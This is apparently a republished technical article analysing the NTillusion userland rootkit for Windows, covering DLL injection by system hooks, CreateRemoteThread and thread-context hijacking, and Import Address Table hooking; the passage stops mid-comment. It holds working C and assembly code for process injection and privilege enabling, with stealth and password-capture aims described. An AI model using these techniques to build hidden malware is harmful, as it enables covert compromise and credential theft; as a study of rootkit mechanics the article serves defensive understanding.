Analysis of a Win32 Userland Rootkit

Summary

A rootkit is a program designed to control the behavior of a given machine. It is often used to hide the illegitimate presence of a backdoor and other such tools. It works by preventing certain elements from being listed when the user requests them, thereby giving the false impression that the machine has not been compromised. Presented here is an analysis of a userland rootkit for Microsoft Windows.

Credit:

The information has been provided by Kdm.
The original article can be found at: http://nonenone.net/misc/NTILLUSION_fullpack.txt


Details

Introduction:
There are different kinds of rootkits. Some act at the very base of the operating system by sitting in kernel land, in privileged ring 0 mode. Others run with lower privileges in ring 3 and are called userland rootkits, as they directly target the user’s applications instead of the system itself. These ring 3 rootkits have seen a resurgence in recent years, since they are somewhat more portable and versatile than ring 0 ones.
As there are multiple ways to stay unseen under Windows, this article does not claim to enumerate all existing methods. It is just a guide to understanding how ring 3 rootkits work, by analysing the mechanisms of one the author created on his own: the [NTillusion rootkit] (see the links at the end of the article).

The NTillusion rootkit has been designed to run under the lowest privileges available to a given Windows account. Indeed, it doesn’t need any administrative privilege to achieve its stealth, as it resides directly inside processes owned by the current user. In short, all the ring 3 programs that a user might use to enumerate files, processes, registry keys, and used ports are closely controlled so that they won’t reveal unwanted things. Meanwhile, the rootkit silently waits for passwords, allowing it to load any device driver as soon as an administrator password is captured.
All this is done in two steps: first, by injecting the rootkit’s code into each application owned by the current user, and second, by replacing strategic functions with its own. These tricks are performed at run time against running processes rather than on binaries on disk, since this also works around Windows File Protection, antivirus software and checksum tools.

Code Injection:
Altering the behavior of a process requires breaking into its memory space in order to execute some code that does the job. Fortunately, Windows performs checks to prevent an application from reading or writing the memory of another application without its permission. Nevertheless, the Windows programmers included several ways to bypass the native inter-process protection, so patching other processes’ memory at runtime is a real possibility. The first step in accessing a running process is done through the OpenProcess API. If the application has the correct security permissions, the function returns a handle to the process; otherwise, it denies access. By enabling the proper privilege, a user may get access to a privileged process, as we’ll see later. In Windows NT, a privilege is a kind of flag granted to a user that allows the user to override what would normally be a restriction on some part of the operating system. This is the bright side. Unfortunately, there is also a seamy side: there are multiple ways to break into the memory space of a running process and run hostile code in it, all using documented functions of the Windows API.

System Hooks:
The best-known technique uses the SetWindowsHookEx function, which sets a hook in the message event handling of applications. When it is used as a system hook, i.e. when the hook is set for the whole userland and its procedure lives in a DLL, the operating system injects the DLL into each running process matching the hook type. For example, if a WH_KEYBOARD hook is used and a key is pressed in Notepad, the system maps the hook’s DLL into notepad.exe’s memory space. Easy as ABC…

But keep in mind that this method is (a little) restricted: only processes that belong to the current user will be affected. Anyway, this is sufficient.

In practice, two components are required to set a system hook:
 * A DLL that will contain the hook filtering procedure for a given event, and of course, the code to be injected into all running processes, which represents the payload.
 * An executable that will load the DLL into memory and make it call the SetWindowsHookEx function, specifying the hook type to be implemented.
The hook type that provides the fastest injection of the DLL into target processes is WH_CBT, designed to handle window events (minimize, maximize, creation, etc…). One flaw of this method is that the DLL is injected without regard to which process is affected, so the DLL must perform a target check by calling GetModuleFileName, then decide whether or not to trigger the payload.
The typical structure of an injection by a system hook is shown below.

#include <windows.h>

HHOOK hHook = NULL; /* global HHOOK var, used to save the hook handle */
HINSTANCE hDLL = NULL; /* global handle to the DLL (in fact, the DLL's base
                          address in memory), presumably set in DllMain (not shown) */

/* The HookProc callback function is called by the system. We use it for
   injection purposes only, as it must exist. */
__declspec(dllexport) LRESULT CALLBACK HookProc(int nCode, WPARAM wParam,
LPARAM lParam)
{
        return CallNextHookEx( hHook, nCode, wParam, lParam);
}

/* This proc is called by the loader to make the DLL set the system-wide
   hook */
__declspec(dllexport) void SetHook()
{
        /* Set hook and save handle for later use */
        hHook = SetWindowsHookEx( WH_CBT, HookProc, hDLL, 0 );
}

The rest of the code is trivial: it involves calling SetWindowsHookEx through the SetHook() procedure that resides inside the DLL. Thus, the hook loader simply loads the DLL, calls GetProcAddress to get the address where SetHook is mapped, then calls it.

CreateRemoteThread:
Another gift for Windows coders is the CreateRemoteThread API. As its name points out, it allows the creation of a thread inside the memory space of a target process. This function was undoubtedly designed with debugger writers in mind, and Windows provides a whole range of functions for remotely reading, writing and executing code through the Windows NT API. Although this is great for debuggers, malicious applications can obviously take advantage of these features as well.
The previous method wasn’t able to target processes running under the context of another user, such as the SYSTEM account. The same holds for this method: it cannot affect processes running under higher security permissions unless the SeDebugPrivilege is enabled. When a process uses this privilege, the system considers it a debugger and therefore grants it access to processes of other users, up to the SYSTEM account. However, this does not by itself lead to a root compromise:
by default only administrators can enable that valuable privilege, and some processes may resist the SeDebugPrivilege using kernel tricks.
With this privilege enabled, any request to access a process with maximum rights is granted.

The following function activates the SeDebugPrivilege for the current process. First, it opens the current process’s token by calling OpenProcessToken with the appropriate rights. Then, it looks up the LUID value associated with the SE_DEBUG_NAME string defined in winnt.h by calling LookupPrivilegeValue. Finally, it activates this privilege through a call to AdjustTokenPrivileges, passing it a properly filled TOKEN_PRIVILEGES structure. Note that AdjustTokenPrivileges reports success even when the account does not hold the privilege; in that case GetLastError() returns ERROR_NOT_ALL_ASSIGNED, so the last error must always be checked.

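#include <windows.h>

/* Enables SeDebugPrivilege in the current process token.
   Returns 1 on success and 0 on failure; GetLastError() then gives the reason
   (ERROR_NOT_ALL_ASSIGNED if the account does not hold the privilege). */
int LoadSeDebugPrivilege(void)
{
        HANDLE hToken;
        LUID Val;
        TOKEN_PRIVILEGES tp;
        DWORD err;

        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES
        | TOKEN_QUERY, &hToken))
                return 0;

        if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Val)) {
                err = GetLastError();
                CloseHandle(hToken);    /* don't leak the token handle */
                SetLastError(err);
                return 0;
        }

        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = Val;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        /* AdjustTokenPrivileges can return TRUE without enabling anything,
           so the last error is checked in every case. */
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        err = GetLastError();

        CloseHandle(hToken);
        SetLastError(err);

        return err == ERROR_SUCCESS;
}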

Activating the SeDebugPrivilege is not necessary as long as you target a process that runs under lower permissions or belongs to the current user.
So be sure you really need it before trying to use it. But let’s go back to the CreateRemoteThread technique.

In practice, this is how the method works:

 * First and foremost, if the target process belongs to another user, the program activates the SeDebugPrivilege.
 * Then it requests a complete handle to the process to be injected using OpenProcess.
 * Using that handle, the program is allowed to use functions affecting the remote process, namely:
    * VirtualProtectEx, to change the memory access protection (read, write and execute);
    * ReadProcessMemory, to retrieve the content of a part of the memory space;
    * WriteProcessMemory, to overwrite a part of the memory;
    * VirtualAllocEx, to allocate memory within the target process.
 * Thus, it can allocate memory and inject the function to be executed along with its arguments (a void* pointing to a simple variable or a more complex structure).
 * Finally, all that remains is to execute the function in the target process context by delegating the task to CreateRemoteThread. This starts a new thread that calls the remote function, passing it carefully selected arguments.

Contrary to the previous method, this one is clean, as it affects only one process at a time. Nevertheless, a drawback is that the injected code completely loses its bearings. As it can no longer rely on the .data section of the original binary, the code has to be specially designed so that the machine code produced by the compiler only uses relative addresses.
Moreover, there’s no guarantee that an API will be at the same address in the remote process. To compensate, we can use the pointer passed as a parameter to our functions to communicate the addresses of two fundamental APIs which we believe to be at the same address in the target process: LoadLibrary and GetProcAddress. In addition, there are methods to determine the address of an API after arriving in a process, using only the FS segment, the Process Environment Block, a few undocumented structures, and a real taste for circular doubly-linked lists. We’ll see these linked lists later.

Producing relocatable code is a perfect exercise to learn how to bypass personal firewalls. Even though this is sometimes very useful, using it in a complex project such as a rootkit is not very convenient.
That’s why we will use another method derived from this one. Rather than designing all your code to be independent of its base address, you can design a small injector that, once injected into the target application’s memory space, loads into that space a DLL containing the actual useful code.
This can be done easily because LoadLibrary(LPCTSTR lpLibFileName) takes only one parameter, which can be supplied remotely through the CreateRemoteThread API. So the trick is to allocate memory in the target, write the name of our DLL there, then use CreateRemoteThread to call LoadLibraryA, passing as a parameter the address where the string containing the name of our DLL is stored.

The following function demonstrates the concept.

/* InjectDll : this function injects the DLL named DLLFile into a process
   identified by its handle hModule (a process handle, despite its name).
   This is used to inject the rootkit into any newly created process.
   (error checks stripped)
*/
int InjectDll(HANDLE hModule, char *DLLFile)
{
        int LenWrite; /* length of DLLFile string */
        char * AllocMem; /* pointer to allocated memory */
        HANDLE hThread; /* handle of newly created thread */
        DWORD Result;
        PTHREAD_START_ROUTINE Injector; /* replacement function address */
        FARPROC pLoadLibrary=NULL; /* LoadLibraryA address */

        /* Calculate the number of bytes to inject */
        LenWrite = strlen(DLLFile) + 1;

        
        /* Allocate requested memory amount for WriteProcessMemory */
        AllocMem = (char *) VirtualAllocEx(hModule,NULL, LenWrite,
                                                MEM_COMMIT,PAGE_READWRITE);
        
        /* Write DLLFile string into target process */
        WriteProcessMemory(hModule, AllocMem , DLLFile, LenWrite, NULL);

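        /* Resolve LoadLibraryA address. fGetProcAddress is the rootkit's own
           resolver (not shown), presumably equivalent to GetProcAddress */
        pLoadLibrary = (FARPROC) fGetProcAddress(
        GetModuleHandle("kernel32.dll"), "LoadLibraryA");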

        /* Make the thread’s entry point to be LoadLibraryA */
        Injector = (PTHREAD_START_ROUTINE) pLoadLibrary;

        /* Create the thread in the remote process */
        hThread = CreateRemoteThread(hModule, NULL, 0, Injector,
                                     (void *) AllocMem, 0, NULL);

        /* Here we may wait before cleaning up */
        /* Time out : 15 seconds */
        Result = WaitForSingleObject(hThread, 15*1000);
        VirtualFreeEx(hModule, (void *) AllocMem, 0, MEM_RELEASE);
        CloseHandle(hThread);

        return 1;
}

Although this method seems interesting, it is by far the most widespread, and it is easy to defeat using a security driver. Moreover, the injected DLL will easily be noticed by any program performing basic module enumeration. Later sections offer a solution to this problem.

Manipulating thread’s context – Overview
CreateRemoteThread isn’t the only debugging API that may be used to execute code in a target process. The principle of the following technique is to reroute a program’s execution flow to malicious code injected into the program’s memory space. This involves three steps.
First, the injector chooses a thread of this process and suspends it.
Then, it injects the code to be executed into the target process memory as before, using VirtualAllocEx/WriteProcessMemory, and adjusts a few addresses that depend on where the code lands in memory. Next, it sets the address of the next instruction to be executed by this thread (the EIP register) to point to the injected code, and restarts the thread. The injected code is then executed in the remote process. Finally, the injected code jumps to the instruction that would have been executed next had the program followed its normal course, so that the thread resumes its activity as soon as possible.

…and getting deeper:
The following lines will discuss how to implement this technique in two different cases. On the one hand, we examine the case of a process created by the injector, and on the other hand, the case of an already running one.

– Process created by the injector:
Here, the target thread is already known: we use the one returned by the CreateProcess function, which creates the process in suspended mode when the CREATE_SUSPENDED flag is specified. In this mode, the process’s primary thread is stopped before it executes the first instruction of the program. Optimal time for a rootkit to operate, huh?

– Process already running in memory (runtime hijacking)
On the other hand, if the process is already running, we must choose one of its threads and stop it. To do this, we enumerate all the threads on the local machine using the CreateToolhelp32Snapshot, Thread32First and Thread32Next functions, keep only those whose owner process ID (THREADENTRY32.th32OwnerProcessID) matches the target process, and choose the first one we’re allowed to access via the OpenThread function.
Once the target thread ID has been found, we simply suspend it by passing the handle acquired, as explained above, to the SuspendThread function.

Generating and injecting assembly code:
Once the target thread has been suspended, the injector simply needs to write the machine code to be executed in the process’ memory space. As in previous cases, this is done by allocating memory using VirtualAllocEx, then writing it in the remote process using WriteProcessMemory. In our case, the machine code is intended to execute the LoadLibraryA function. The code appears as follows.

        pushfd ; push EFLAGS
        pushad ; push general purpose registers

        ; payload body :
        push &<dll_path> ; push the address of DLL path string
        call LoadLibraryA ; call LoadLibrary API.

        popad ; pop general purpose registers
        popfd ; pop EFLAGS
        jmp Original_Eip ; resume execution where it left off before the
                            ; hijacking

Here it is clear that the address of the dll path will change between executions as it depends on the VirtualAllocEx function, which itself will try to allocate memory wherever some is available. The same is true for the address of Original_Eip which is subject to change between executions.
Only the address of LoadLibraryA can be considered static, and even that is of little help, because it changes according to the version of Windows, service packs, and various updates. Sneaky, huh?

Triggering the payload, and returning to normal for the host process:
As the code to be executed has been placed in memory, all that remains is to execute it. This involves three steps. First, we retrieve the remote thread’s registers with GetThreadContext and set the EIP field, which holds the address of the next instruction to be executed, to point to the injected code. Then we call SetThreadContext to apply the modified context. Finally, we resume the execution of the remote thread by calling the ResumeThread API.

These methods offer an alternative to the overly popular CreateRemoteThread function, which could have been hooked by a driver to protect the machine against this kind of trick. But everything has a downside: under Windows 9x/Me there is no equivalent of VirtualAllocEx, so the memory must be browsed meticulously using the PE header to find a free zone.

According to the sections above, there seems to be no perfect method.
Each presents advantages and drawbacks. The major advantage of system hooks is their portability from one version of Windows to another, from Windows 95 to XP. The advantage of CreateRemoteThread is that it can precisely target a single process and is easy to use. Finally, the advantage of injection using Set/GetThreadContext and EIP hijacking is that it is less commonly used and therefore less likely to be detected than the others.
Other methods also exist to trigger the load of a given DLL inside the memory space of a target process.
By design, the AppInit_DLLs value of the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows key lists the DLLs that the system loads into each process relying on user32.dll. In addition, there are BHOs (Browser Helper Objects), which act as plugins for Internet Explorer and enable the loading of any sort of code.

Code interception:
Code interception routines are critical, since they have to meet efficiency and speed requirements. The methods presented in this section have their own advantages and drawbacks. As with the injection techniques, there’s more than one way to do the job. The goal of these methods is to redirect another program’s function calls while it is loaded in memory. For the target program, everything takes place as if it had called the desired functions as usual, but in fact the call is redirected to the replacement API.
Some methods of API interception are based on features intentionally provided by the designers of the PE format to simplify the loader’s task when a module is mapped into memory. The function redirection takes place once the code we inject into the target process is executed. To understand how these methods work, a thorough understanding of the PE format is needed.

The PE Format:
The Portable Executable (PE) format organizes Windows executables and DLLs according to a set of rules. A lot of information is readily available in the PE header located at the very beginning of the file. When an executable is loaded, its image on disk (.exe/.dll) is mapped into memory and its overall structure is maintained, which makes it easy to find your way around in a process if you know a module’s base address. In the PE format, many values are Relative Virtual Addresses (RVAs), i.e. offsets from the base address of the module in memory. Thus the real memory address is equal to the sum of the module’s base address and the RVA.
The image starts at the base address (RVA 0) with the MS-DOS header, followed by the MS-DOS stub, the small program responsible for displaying the famous ‘This program cannot be run in DOS mode’.

/* Extracts from winnt.h.
   At Module Base Address (rva 0) : */
typedef struct _IMAGE_DOS_HEADER { /* DOS .EXE header */
    WORD e_magic; /* Magic number */
    […]
    LONG e_lfanew; /* File address of new exe header */
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

In fact, the real header is located at RVA IMAGE_DOS_HEADER->e_lfanew. It is a structure of type IMAGE_NT_HEADERS, including a signature and two structures:

/* At IMAGE_DOS_HEADER->e_lfanew : */
typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

– A structure IMAGE_FILE_HEADER, which provides information about the number of sections in the executable, the type of processor it was compiled for, etc.
– A structure IMAGE_OPTIONAL_HEADER, which contains a table of structures of type IMAGE_DATA_DIRECTORY.
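To make the e_lfanew indirection concrete, here is a minimal sketch that locates IMAGE_NT_HEADERS in a module image. It is not code from NTillusion: it assumes the module is available as a byte buffer laid out as in memory (so a buffer offset equals an RVA), and it reads fields through explicit little-endian helpers instead of the winnt.h structures, so it compiles on any platform. The names pe_nt_headers_rva, rd16 and rd32 are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* PE fields are little-endian; read them byte by byte so the sketch does not
   depend on host endianness or alignment. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: given a mapped image (offset == RVA), return the RVA of
   IMAGE_NT_HEADERS, or 0 if the DOS or PE signature is missing. */
static uint32_t pe_nt_headers_rva(const uint8_t *image, size_t size)
{
    uint32_t e_lfanew;

    assert(image != NULL);
    if (size < 0x40 || rd16(image) != 0x5A4D)   /* e_magic == "MZ" */
        return 0;
    e_lfanew = rd32(image + 0x3C);              /* IMAGE_DOS_HEADER.e_lfanew */
    if ((size_t)e_lfanew > size - 4 ||
        rd32(image + e_lfanew) != 0x00004550)   /* Signature == "PE\0\0" */
        return 0;
    return e_lfanew;
}
```

Inside an injected DLL, the buffer would typically be the module base itself (for example the value returned by GetModuleHandle), with OptionalHeader.SizeOfImage as its size. For a raw file read from disk, RVAs beyond the headers would first have to be translated through the section table.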

/* At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader : */
typedef struct _IMAGE_OPTIONAL_HEADER {
    WORD Magic; /* Signature WORD identifying the header type: 0x010B
   (IMAGE_NT_OPTIONAL_HDR32_MAGIC) for this 32-bit header; 64-bit images use
   IMAGE_OPTIONAL_HEADER64 with 0x020B. */
    […]
    DWORD NumberOfRvaAndSizes; /* The number of entries in the
    DataDirectory array (below). This value is always set to 16 by the
    current tools. */
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
/* An array of IMAGE_DATA_DIRECTORY structures. The initial array elements contain the starting RVA and sizes of important portions of the executable file. Some elements at the end of the array are currently unused. */
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

The first element of the array is always the address and size of the exported function table (if present). The second array entry is the address and size of the imported function table, and so on.

These IMAGE_DATA_DIRECTORY entries contain the address (an RVA) and size of various tables of the executable (exports, imports, resources, and so on), as follows.
/* At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[x]: */
typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD VirtualAddress;
    DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

/* The different sections have a defined index in the DataDirectory
array: */
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 /* Export Directory */
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 /* Import Directory */
[…]

Between the PE header and the content of the first section lies the section table. It describes each section of the module: name, RVA, size, and characteristics such as read, write and execute permissions (IMAGE_SCN_* flags).

At (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] is the RVA to the Import Table. Similarly, the Export Address Table RVA (if it exists) may be found at (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].
We’ll see how these tables are organised in a moment.
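Reading a data directory entry only requires knowing where the optional header starts and which layout it uses. The sketch below, again a hypothetical helper working on a mapped image buffer rather than the rootkit’s code, returns DataDirectory[index].VirtualAddress. It assumes nt_rva has already been obtained from e_lfanew, and it handles both the 32-bit header described above (Magic 0x10B) and the 64-bit one (Magic 0x20B), whose DataDirectory array starts 16 bytes later because several of its fields are 64 bits wide.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Indexes into DataDirectory, mirroring winnt.h */
#define PE_DIR_EXPORT 0   /* IMAGE_DIRECTORY_ENTRY_EXPORT */
#define PE_DIR_IMPORT 1   /* IMAGE_DIRECTORY_ENTRY_IMPORT */

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: return DataDirectory[index].VirtualAddress for a mapped
   image whose IMAGE_NT_HEADERS start at nt_rva, or 0 if the entry is absent.
   The matching Size field sits 4 bytes further on. */
static uint32_t pe_directory_rva(const uint8_t *image, size_t size,
                                 uint32_t nt_rva, unsigned index)
{
    /* OptionalHeader follows the 4-byte Signature and the 20-byte FileHeader */
    size_t opt = (size_t)nt_rva + 4 + 20;
    size_t dirs;

    assert(image != NULL);
    if (index >= 16 || opt + 2 > size)      /* 16 = IMAGE_NUMBEROF_DIRECTORY_ENTRIES */
        return 0;
    switch (rd16(image + opt)) {            /* OptionalHeader.Magic */
    case 0x10B: dirs = opt + 96;  break;    /* PE32:  IMAGE_OPTIONAL_HEADER32 */
    case 0x20B: dirs = opt + 112; break;    /* PE32+: IMAGE_OPTIONAL_HEADER64 */
    default:    return 0;
    }
    if (dirs + 8 * ((size_t)index + 1) > size)
        return 0;
    if (index >= rd32(image + dirs - 4))    /* NumberOfRvaAndSizes */
        return 0;
    return rd32(image + dirs + 8 * (size_t)index);
}
```

Checking NumberOfRvaAndSizes before indexing matters because the array is not guaranteed to hold all 16 entries.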

Redirecting the Import Address Table:
After injecting our code into the application’s memory space, it is possible to change its behavior. We use a technique called ‘API hooking’, which involves replacing APIs with our own routines. The most common way to do this is to alter the Import Address Table of a given module.
When a program is executed, its various sections are mapped into memory, and the addresses of the functions it calls are resolved according to the Windows version and service pack. The PE format provides a clever way to do this update without patching every single call. When you compile your program, a call to an external API does not point directly to the function’s entry point in memory. Instead, it goes through an indirect jump (or call) via a DWORD pointer stored in a table called the Import Address Table (IAT), since it contains the address of each imported function. At load time, the loader only needs to fill in each IAT entry to set the target of every call to the corresponding API.
Thus, to hijack a function, we simply patch its IAT entry so that it points to our code instead of the true entry point of the target API. In this way, we gain full control over the application, and any subsequent calls to that function are redirected.
The concept of a direct, statically resolved call is important, because depending on how the function is called, the redirection may not take place. This is the case when the call is not resolved by the loader, i.e. when it is made using dynamic resolution (LoadLibrary/GetProcAddress), a fixed address such as FARPROC myFunc = 0x87654, or an address looked up in the DLL’s Export Address Table (EAT), as GetProcAddress itself does.
Note that it is possible to redirect LoadLibrary and GetProcAddress to overcome a part of the problem.
When redirecting via the Import Address Table, the technique consists of modifying the slot through which the redirection jump for a given function is made, so that it points to a memory area controlled by the injector. So, to modify the IAT of a remote process, we must inject our code into the target process, have it executed, and recover the address of the NT headers structure in order to locate the Import Table. Then we must scan that table, find the Import Address Table of the correct DLL, and patch the address of the correct API. Let us take an example. Imagine that we want to hook the MessageBoxA API. First we must find the IMAGE_IMPORT_DESCRIPTOR associated with user32.dll, then scan the Import Address Table for that DLL. As the goal is to replace the genuine address with a new one, all that remains is to walk this table and compare entries; when the target is found, we unlock the memory protection, patch the entry, and finally restore the previous memory protection. This is the general idea.
In fact, this is a little more complicated since the structures aren’t that simple.
As we saw before, at (IMAGE_DOS_HEADER->e_lfanew)->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] is the RVA to the Import Table. The Import Table is an array of IMAGE_IMPORT_DESCRIPTORs, one for each imported DLL. There’s no field indicating the number of structures in this array. Instead, the last element of the array is indicated by an IMAGE_IMPORT_DESCRIPTOR that has fields filled with NULLs.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union
    {
        DWORD Characteristics; /* This field is an offset (an RVA) to an array of pointers. Each of these pointers points to an IMAGE_IMPORT_BY_NAME structure. 0 for terminating null import descriptor */
        DWORD OriginalFirstThunk; /* RVA to original unbound IAT (PIMAGE_THUNK_DATA)*/
    };
    
    DWORD TimeDateStamp;
    DWORD ForwarderChain; /* This field relates to forwarding.
    Forwarding involves one DLL sending on references to one of its functions to another DLL. For example, in Windows NT, KERNEL32.DLL forwards some of its exported functions to NTDLL.DLL. -1 if no forwarders */
    DWORD Name; /* This is an RVA to a NULL-terminated ASCII string containing the imported DLL’s name. Common examples are ‘KERNEL32.DLL’ and ‘USER32.DLL’. */
    DWORD FirstThunk; /* This field is an offset (an RVA) to an IMAGE_THUNK_DATA union. In almost every case, the union is interpreted as a pointer to an IMAGE_IMPORT_BY_NAME structure. If the field isn’t one of these pointers, then it’s supposedly treated as an export ordinal value for the DLL that’s being imported. */
} IMAGE_IMPORT_DESCRIPTOR;
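The terminating all-zero descriptor is what bounds the walk over the Import Table. The following sketch mirrors the DLL lookup loop of HijackApiEx on a portable byte buffer: it steps through 20-byte IMAGE_IMPORT_DESCRIPTOR entries (Name is the fourth DWORD, at offset 12), stops at the first one whose Name is 0, and compares names case-insensitively. The function names and the mapped-buffer assumption are illustrative, not part of NTillusion.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Case-insensitive ASCII equality, standing in for _stricmp */
static int ascii_ieq(const char *a, const char *b)
{
    while (*a != '\0' && tolower((unsigned char)*a) == tolower((unsigned char)*b)) {
        a++;
        b++;
    }
    return tolower((unsigned char)*a) == tolower((unsigned char)*b);
}

/* Hypothetical helper: walk the IMAGE_IMPORT_DESCRIPTOR array at import_rva
   and return the RVA of the descriptor whose Name matches dll_name, or 0. */
static uint32_t pe_find_import(const uint8_t *image, size_t size,
                               uint32_t import_rva, const char *dll_name)
{
    size_t desc;

    assert(image != NULL && dll_name != NULL);
    for (desc = import_rva; desc + 20 <= size; desc += 20) {
        uint32_t name_rva = rd32(image + desc + 12);   /* ->Name */
        if (name_rva == 0)
            break;                                      /* terminating descriptor */
        /* only compare if the name string lies fully inside the buffer */
        if (name_rva < size &&
            memchr(image + name_rva, '\0', size - name_rva) != NULL &&
            ascii_ieq((const char *)(image + name_rva), dll_name))
            return (uint32_t)desc;
    }
    return 0;
}
```

Like the original loop, this detects the end of the array through the Name field alone, which is enough since a real descriptor always names its DLL.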

In the Import Table, there’s one IMAGE_IMPORT_DESCRIPTOR entry for each imported DLL. Each IMAGE_IMPORT_DESCRIPTOR typically points to two arrays known as the Import Address Table (IAT) and the Import Name Table (INT).
The two arrays have a dual life.
Before execution, each entry can contain either the ordinal of the imported API or an RVA to an IMAGE_IMPORT_BY_NAME structure holding the name of the imported function. There’s one entry in the IAT and in the INT for each imported function. Both arrays are zero-terminated.

/* So before loading, the tables are arrays containing structures: */
typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD Hint; /* the best guess as to what the export ordinal for the imported function is */
    BYTE Name[1]; /* ASCII string with the name of the imported
 function. */
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;

Before loading, the Characteristics member of the union is used; it points to an array whose entries reference IMAGE_IMPORT_BY_NAME structures.
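To illustrate how an Import Name Table entry is decoded, the sketch below walks a 32-bit INT and returns the index of a named import. An entry with the high bit set (IMAGE_ORDINAL_FLAG32, the same test IMAGE_SNAP_BY_ORDINAL performs) is an ordinal import and is skipped; otherwise it is an RVA to an IMAGE_IMPORT_BY_NAME, whose name follows the 2-byte Hint. The helper name and the mapped-buffer assumption are hypothetical. Unlike the _stricmp used in HijackApiEx, it compares names with strcmp, because GetProcAddress matches export names case-sensitively.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PE_ORDINAL_FLAG32 0x80000000u   /* mirrors IMAGE_ORDINAL_FLAG32 */

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: scan a PE32 Import Name Table (zero-terminated array of
   32-bit IMAGE_THUNK_DATA) and return the index of api_name, or -1. */
static long pe_find_thunk_index(const uint8_t *image, size_t size,
                                uint32_t int_rva, const char *api_name)
{
    size_t i;

    assert(image != NULL && api_name != NULL);
    for (i = 0; (size_t)int_rva + 4 * (i + 1) <= size; i++) {
        uint32_t thunk = rd32(image + int_rva + 4 * i);
        size_t name;

        if (thunk == 0)
            break;                          /* end of the table */
        if (thunk & PE_ORDINAL_FLAG32)
            continue;                       /* imported by ordinal (low 16 bits) */
        name = (size_t)thunk + 2;           /* skip IMAGE_IMPORT_BY_NAME.Hint */
        if (name < size &&
            memchr(image + name, '\0', size - name) != NULL &&
            strcmp((const char *)(image + name), api_name) == 0)
            return (long)i;
    }
    return -1;
}
```

Because the INT and the IAT are parallel arrays, the returned index also identifies the IAT slot that holds the API’s address once the module is loaded.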

During load time, the loader forgets about IMAGE_IMPORT_BY_NAME structures and manipulates IMAGE_THUNK_DATA. The two are essentially interchangeable, since an IMAGE_THUNK_DATA can act either as a pointer to an IMAGE_IMPORT_BY_NAME (for the Import Name Table) or as a function pointer (for the Import Address Table).

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        PBYTE ForwarderString;
        PDWORD Function;
        DWORD Ordinal;
        PIMAGE_IMPORT_BY_NAME AddressOfData;
    } u1;
} IMAGE_THUNK_DATA32;

Indeed, during load time, the table pointed to by IMAGE_IMPORT_DESCRIPTOR->FirstThunk is overwritten by the loader, and its IMAGE_THUNK_DATA entries are no longer interpreted as PIMAGE_IMPORT_BY_NAME, but as function pointers. To sum up, the Import Address Table, which referenced the imported functions’ names, is replaced by an array of API addresses. The Import Name Table, on the other hand, stays unchanged: it remains an array of IMAGE_THUNK_DATA using the PIMAGE_IMPORT_BY_NAME member of the u1 union.

Before loading:
  Import Name Table    : IMAGE_IMPORT_DESCRIPTOR->Characteristics     (type: IMAGE_IMPORT_BY_NAME array)
  Import Address Table : IMAGE_IMPORT_DESCRIPTOR->FirstThunk          (type: IMAGE_IMPORT_BY_NAME array)

After loading:
  Import Name Table    : IMAGE_IMPORT_DESCRIPTOR->OriginalFirstThunk  (type: IMAGE_THUNK_DATA array)
  Import Address Table : IMAGE_IMPORT_DESCRIPTOR->FirstThunk          (type: IMAGE_THUNK_DATA array)

Now we have all the elements to set up an interception function hacking the Import Address Table.

/* A simple cast macro: builds a pointer of type 'cast' from a base address and an RVA */
#define MakePtr(cast, ptr, addValue ) (cast) ( (DWORD)(ptr)+(DWORD)(addValue))

/* Scans through the IAT and patches the target function's entry point address.
   It uses function name comparison instead of entry point address
   comparison because Explorer handles some APIs oddly at load time under
